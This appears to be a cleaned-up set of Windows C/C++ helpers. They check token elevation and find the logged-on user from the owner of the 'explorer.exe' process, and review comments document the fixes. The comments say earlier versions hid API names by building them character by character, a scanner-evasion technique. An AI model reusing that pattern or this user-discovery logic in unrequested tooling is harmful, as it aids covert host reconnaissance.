/* Reports whether the token of the current process has the "limited"
 * elevation type.
 *
 * Returns TRUE only when the token could be opened, the TokenElevationType
 * query succeeded, and the reported type is TokenElevationTypeLimited.
 * Returns FALSE when either API pointer is unavailable, when the token
 * cannot be opened, or when the query fails.
 */
static BOOL is_process_limited(void)
{
    HANDLE process_token;
    TOKEN_ELEVATION_TYPE elevation = TokenElevationTypeDefault;
    DWORD returned;
    BOOL queried;

    /* Both entry points are resolved elsewhere and may be NULL. */
    if (!pOpenProcessToken || !pGetTokenInformation)
        return FALSE;

    /* TOKEN_QUERY is the only right requested on the token. */
    if (!pOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &process_token))
        return FALSE;

    queried = pGetTokenInformation(process_token, TokenElevationType,
                                   &elevation, sizeof(elevation), &returned);

    /* The handle is released before the result is inspected. */
    CloseHandle(process_token);

    if (!queried)
        return FALSE;

    return elevation == TokenElevationTypeLimited;
}
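/// @brief Returns the account name that owns the "explorer.exe" process.
///
/// The process id is obtained from GetProcessID("explorer.exe") (defined
/// elsewhere). The process token is queried for TokenUser and the SID is
/// translated to a name with LookupAccountSidA.
///
/// @return A 256-char buffer allocated with new[] that holds the account
///         name, or NULL on any failure. The caller owns the buffer
///         (presumably released with delete[] -- confirm against callers).
///
/// NOTE(review): GetProcessID is not visible here. If it selects the process
/// by image name only, any local user can run a process called explorer.exe,
/// so the returned name is a hint and not an authenticated identity; do not
/// base access decisions on it.
char *GetLogUser2K()
{
    typedef BOOL (WINAPI *OpenProcessTokenT)(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
    typedef BOOL (WINAPI *LookupAccountSidAT)(LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName,
                                              LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName,
                                              PSID_NAME_USE peUse);
    typedef BOOL (WINAPI *GetTokenInformationT)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass,
                                                LPVOID TokenInformation, DWORD TokenInformationLength,
                                                PDWORD ReturnLength);
    typedef HANDLE (WINAPI *OpenProcessT)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);

    // The module name used to be assembled one character at a time in a
    // randomly named local array; the bytes are the same, a literal is
    // simply reviewable.
    const char szAdvapi32[] = "ADVAPI32.dll";

    // One LoadLibrary reference, released before returning. The previous
    // code took a new reference for every resolved function and never
    // released any of them.
    HMODULE hAdvapi32 = LoadLibraryA(szAdvapi32);
    if (hAdvapi32 == NULL)
        return NULL;

    // kernel32 is already mapped into the process, so no extra reference is needed.
    HMODULE hKernel32 = GetModuleHandleA("KERNEL32.dll");

    OpenProcessTokenT pOpenProcessToken =
        (OpenProcessTokenT)GetProcAddress(hAdvapi32, "OpenProcessToken");
    LookupAccountSidAT pLookupAccountSidA =
        (LookupAccountSidAT)GetProcAddress(hAdvapi32, "LookupAccountSidA");
    GetTokenInformationT pGetTokenInformation =
        (GetTokenInformationT)GetProcAddress(hAdvapi32, "GetTokenInformation");
    OpenProcessT pOpenProcess =
        hKernel32 ? (OpenProcessT)GetProcAddress(hKernel32, "OpenProcess") : NULL;

    // A failed GetProcAddress used to be called through as a NULL pointer.
    if (!pOpenProcessToken || !pLookupAccountSidA || !pGetTokenInformation || !pOpenProcess)
    {
        FreeLibrary(hAdvapi32);
        return NULL;
    }

    DWORD dwProcessID = GetProcessID("explorer.exe");
    if (dwProcessID == 0)
    {
        FreeLibrary(hAdvapi32);
        return NULL;
    }

    BOOL   fLookedUp  = FALSE;
    HANDLE hProc      = NULL;
    HANDLE hToken     = NULL;
    BYTE  *pTokenBuf  = NULL;   // raw storage for the TOKEN_USER structure
    char  *lpUserName = NULL;

    __try
    {
        // Open the process with PROCESS_QUERY_INFORMATION access
        hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
        if (hProc == NULL)
        {
            __leave;
        }

        if (!pOpenProcessToken(hProc, TOKEN_QUERY, &hToken))
        {
            hToken = NULL;   // never close a handle the API did not hand out
            __leave;
        }

        // First call only asks for the required size; it is expected to fail.
        DWORD dwNeedLen = 0;
        pGetTokenInformation(hToken, TokenUser, NULL, 0, &dwNeedLen);
        if (dwNeedLen == 0)
        {
            __leave;
        }

        pTokenBuf = new BYTE[dwNeedLen];
        if (!pGetTokenInformation(hToken, TokenUser, pTokenBuf, dwNeedLen, &dwNeedLen))
        {
            __leave;
        }

        SID_NAME_USE sn;
        // LookupAccountSidA is the ANSI entry point, so the domain buffer is
        // char rather than TCHAR.
        char  szDomainName[MAX_PATH];
        DWORD dwDmLen  = MAX_PATH;
        DWORD nNameLen = 256;

        lpUserName = new char[256];
        lpUserName[0] = '\0';

        fLookedUp = pLookupAccountSidA(NULL,
                                       reinterpret_cast<TOKEN_USER *>(pTokenBuf)->User.Sid,
                                       lpUserName, &nNameLen,
                                       szDomainName, &dwDmLen, &sn);
    }
    __finally
    {
        if (hProc)
            ::CloseHandle(hProc);
        if (hToken)
            ::CloseHandle(hToken);

        // Freed with the same element type it was allocated with.
        delete[] pTokenBuf;

        // A failed lookup used to return the uninitialised name buffer.
        if (!fLookedUp)
        {
            delete[] lpUserName;
            lpUserName = NULL;
        }

        FreeLibrary(hAdvapi32);
    }

    // Returned after the termination handler: a return statement inside
    // __finally discards any exception that is unwinding through it.
    return lpUserName;
}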
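/// @brief Finds the account name owning the first "explorer.exe" process of a
///        process snapshot.
///
/// The required Advapi32/Kernel32 entry points are resolved at run time, a
/// process snapshot is walked until an image named "explorer.exe"
/// (case-insensitive) is found, and the TokenUser SID of that process is
/// translated with LookupAccountSid. Every step is reported through AddLog.
///
/// @param csUserName Receives the account name; written only on success.
/// @return TRUE when a non-empty account name was found, FALSE otherwise.
///
/// NOTE(review): the process is selected by image name alone and the first
/// match wins. Any user can start a process with that name, and a host with
/// several interactive sessions has several such processes, so the result is
/// informational and must not be used as an authenticated identity.
BOOL CSysInfo::getUserNameFromExplorerProcess(CString &csUserName)
{
	typedef HANDLE (WINAPI *PFN_CreateToolhelp32Snapshot)(DWORD, DWORD);
	typedef BOOL   (WINAPI *PFN_Process32Walk)(HANDLE, LPPROCESSENTRY32);
	typedef HANDLE (WINAPI *PFN_OpenProcess)(DWORD, BOOL, DWORD);
	typedef BOOL   (WINAPI *PFN_OpenProcessToken)(HANDLE, DWORD, PHANDLE);
	typedef BOOL   (WINAPI *PFN_LookupAccountSid)(LPCTSTR, PSID, LPTSTR, LPDWORD, LPTSTR, LPDWORD, PSID_NAME_USE);
	typedef BOOL   (WINAPI *PFN_GetTokenInformation)(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD);

	// Export names that depend on the character set of the build.
#ifdef _UNICODE
	const char *szLookupAccountSid = "LookupAccountSidW";
	const char *szProcess32First   = "Process32FirstW";
	const char *szProcess32Next    = "Process32NextW";
#else
	const char *szLookupAccountSid = "LookupAccountSidA";
	const char *szProcess32First   = "Process32First";
	const char *szProcess32Next    = "Process32Next";
#endif

	TCHAR			szUserName[255];
	DWORD			dwName = 255;
	TCHAR			szReferencedDomainName[255];
	DWORD			dwReferencedDomainName = 255;
	SID_NAME_USE	peUse;
	DWORD			dwReturnLength = 0;
	PROCESSENTRY32	pe;

	// The union gives the buffer the alignment of TOKEN_USER; the previous
	// TCHAR array was cast to TOKEN_USER* without that guarantee.
	union { TOKEN_USER user; BYTE raw[255]; } tokenInfo;

	// Every handle starts in its "nothing to release" state so that the
	// single cleanup below is correct on every path.
	HANDLE	hToken		= NULL;
	HANDLE	hExplorer	= NULL;
	HANDLE	hSnapshot	= INVALID_HANDLE_VALUE;
	HMODULE	hAdv		= NULL;
	HMODULE	hKernel		= NULL;
	BOOL	bLookedUp	= FALSE;

	PFN_CreateToolhelp32Snapshot	pCreateToolhelp32Snapshot = NULL;
	PFN_Process32Walk				pProcess32First = NULL;
	PFN_Process32Walk				pProcess32Next = NULL;
	PFN_OpenProcess					pOpenProcess = NULL;
	PFN_OpenProcessToken			pOpenProcessToken = NULL;
	PFN_LookupAccountSid			pLookupAccountSid = NULL;
	PFN_GetTokenInformation			pGetTokenInformation = NULL;

	pe.dwSize = sizeof( PROCESSENTRY32 );

	AddLog( _T( "getUserNameFromExplorerProcess: Trying to find logged on User ID from <explorer.exe> process...\n"));

	// First, try to use Advapi.dll
	if( !(hAdv = LoadLibrary( _T( "Advapi32.dll"))))
	{
		AddLog( _T( "\tFailed to load AdvApi32 library !\n"));
		return FALSE;
	}
	hKernel = GetModuleHandle( _T( "KERNEL32.DLL"));

	do
	{
		// Short-circuit order matches the original so GetLastError() still
		// belongs to the first lookup that failed.
		if( !(pOpenProcessToken = (PFN_OpenProcessToken) GetProcAddress( hAdv, "OpenProcessToken")) ||
			!(pOpenProcess = (PFN_OpenProcess) GetProcAddress( hKernel, "OpenProcess")) ||
			!(pGetTokenInformation = (PFN_GetTokenInformation) GetProcAddress( hAdv, "GetTokenInformation")) ||
			!(pLookupAccountSid = (PFN_LookupAccountSid) GetProcAddress( hAdv, szLookupAccountSid)))
		{
			AddLog( _T( "\tFailed to load AdvApi32 library with error <%i> !\n"), GetLastError());
			break;
		}

		// Try to use kernel32 to enum process
		if( !(pCreateToolhelp32Snapshot = (PFN_CreateToolhelp32Snapshot) GetProcAddress( hKernel, "CreateToolhelp32Snapshot")) ||
			!(pProcess32First = (PFN_Process32Walk) GetProcAddress( hKernel, szProcess32First)) ||
			!(pProcess32Next = (PFN_Process32Walk) GetProcAddress( hKernel, szProcess32Next)))
		{
			AddLog( _T( "\tFailed to load Kernel32 process access functions with error <%i> !\n"), GetLastError());
			break;
		}

		// Create snapshot of running processes. Only the process list is
		// walked, so TH32CS_SNAPPROCESS replaces TH32CS_SNAPALL.
		if( (hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 )) == INVALID_HANDLE_VALUE )
		{
			AddLog( _T( "\tCreateToolhelp32Snapshot failed with error <%i> !\n"), GetLastError());
			break;
		}

		// Trying to find explorer.exe into snapshot
		if( !pProcess32First( hSnapshot, &pe) )
		{
			AddLog( _T( "\tProcess32First failed with error <%i> !\n"), GetLastError());
			break;
		}

		BOOL bExplorerFound = FALSE;
		do
		{
			if( !CString(pe.szExeFile).CompareNoCase( _T( "explorer.exe")))
			{
				bExplorerFound = TRUE;
				break;
			}
			pe.dwSize = sizeof( PROCESSENTRY32 );
		}
		while (pProcess32Next( hSnapshot, &pe ));

		if (!bExplorerFound)
		{
			AddLog( _T( "\tCould not find <explorer.exe> process !\n"));
			break;
		}

		// Retrieve a handle on explorer.exe process using ID.
		// Least privilege: the handle is only passed to OpenProcessToken, so
		// PROCESS_QUERY_INFORMATION replaces PROCESS_ALL_ACCESS.
		if( !(hExplorer = pOpenProcess( PROCESS_QUERY_INFORMATION, FALSE, pe.th32ProcessID )))
		{
			AddLog( _T( "\tFailed to open <explorer.exe> process with error <%i> !\n"), GetLastError());
			break;
		}

		// Open token associated to explorer.exe to get information.
		// TOKEN_QUERY is the right GetTokenInformation needs for TokenUser.
		if( !pOpenProcessToken( hExplorer, TOKEN_QUERY, &hToken ) )
		{
			AddLog( _T( "\tOpenProcessToken failed with error <%i>\n"), GetLastError());
			// The previous code closed hToken here although it had never
			// been assigned a value.
			hToken = NULL;
			break;
		}

		if( !pGetTokenInformation( hToken, TokenUser, &tokenInfo, sizeof( tokenInfo), &dwReturnLength))
		{
			AddLog( _T( "\tGetTokenInformation failed with error <%i>\n"), GetLastError());
			break;
		}

		// Lookup user account running explorer.exe process
		if( !pLookupAccountSid( NULL, tokenInfo.user.User.Sid, szUserName, &dwName, szReferencedDomainName, &dwReferencedDomainName, &peUse ) )
		{
			AddLog( _T( "\tLookupAccountSid failed with error <%i>\n"), GetLastError());
			break;
		}

		bLookedUp = TRUE;
	}
	while (FALSE);

	// Single cleanup point for every path above.
	if (hExplorer)
		CloseHandle( hExplorer );
	if (hToken)
		CloseHandle( hToken );
	if (hSnapshot != INVALID_HANDLE_VALUE)
		CloseHandle( hSnapshot );
	FreeLibrary( hAdv );

	if (!bLookedUp)
		return FALSE;

	// Ensure username exists
	if( szUserName[0] == _T( '\0') )
	{
		AddLog( _T( "\tFound empty user, so assuming failed !\n"));
		return FALSE;
	}
	AddLog( _T( "\t\t<User: %s>\n\tOK\n"), szUserName);
	csUserName = szUserName;
	return TRUE;
}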
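//================= Get the current logged-on user name and computer name ====================
/// @brief Looks up the account and domain name of the user owning the token
///        returned by GetTokenByName(hToken, "EXPLORER.EXE").
///
/// @param szUser   Receives the account name. Must hold at least 50 chars:
///                 that capacity is reported to LookupAccountSidA and the
///                 real size of the caller's array cannot be checked here.
/// @param szDomain Receives the referenced domain name; same 50-char
///                 requirement as szUser.
/// @return TRUE when both names were written, FALSE on any failure. The
///         output buffers are not cleared on failure.
///
/// NOTE(review): GetTokenByName is defined elsewhere; it presumably picks the
/// process by image name. A name match is not proof of identity, so the
/// result should not drive access decisions.
BOOL GetCurrentUserName(char szUser[],char szDomain[])
{
	if (szUser == NULL || szDomain == NULL)
	{
		return FALSE;
	}

	// Resolve the two advapi32 entry points once and verify them. The
	// previous code took a new LoadLibrary reference per function, never
	// released it, and called the pointers without checking for NULL.
	// The API names were built one character at a time in randomly named
	// arrays; the bytes are identical, literals are simply reviewable.
	HMODULE hAdvapi32 = LoadLibraryA("ADVAPI32.dll");
	if (hAdvapi32 == NULL)
	{
		return FALSE;
	}
	GetTokenInformationT pGetTokenInformation =
		(GetTokenInformationT)GetProcAddress(hAdvapi32, "GetTokenInformation");
	LookupAccountSidAT pLookupAccountSidA =
		(LookupAccountSidAT)GetProcAddress(hAdvapi32, "LookupAccountSidA");
	if (!pGetTokenInformation || !pLookupAccountSidA)
	{
		FreeLibrary(hAdvapi32);
		return FALSE;
	}

	// Get the token of the shell
	HANDLE hToken = NULL;
	if (!GetTokenByName(hToken, "EXPLORER.EXE"))
	{
		FreeLibrary(hAdvapi32);
		return FALSE;
	}

	BOOL bResult = FALSE;
	DWORD cbti = 0;
	PTOKEN_USER ptiUser = NULL;
	SID_NAME_USE snu;

	// Query the required buffer size. This call is expected to fail with
	// ERROR_INSUFFICIENT_BUFFER; success or any other error is a failure.
	if (!pGetTokenInformation(hToken, TokenUser, NULL, 0, &cbti)
		&& GetLastError() == ERROR_INSUFFICIENT_BUFFER
		&& cbti != 0)
	{
		// Allocate the buffer. CloseHandle and the heap functions are base
		// kernel32 APIs and are called directly; resolving them through
		// GetProcAddress only added pointers that were never checked.
		ptiUser = (PTOKEN_USER)HeapAlloc(GetProcessHeap(), 0, cbti);

		// Fetch the token information
		if (ptiUser && pGetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti))
		{
			// Capacity, in chars, assumed for the caller's buffers.
			DWORD nUser = 50;
			DWORD nDomain = 50;

			// Translate the user's SID into user name and domain
			if (pLookupAccountSidA(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu))
			{
				bResult = TRUE;
			}
		}
	}

	// Single cleanup for every path after the token was obtained.
	if (ptiUser)
	{
		HeapFree(GetProcessHeap(), 0, ptiUser);
	}
	CloseHandle(hToken);
	FreeLibrary(hAdvapi32);
	return bResult;
}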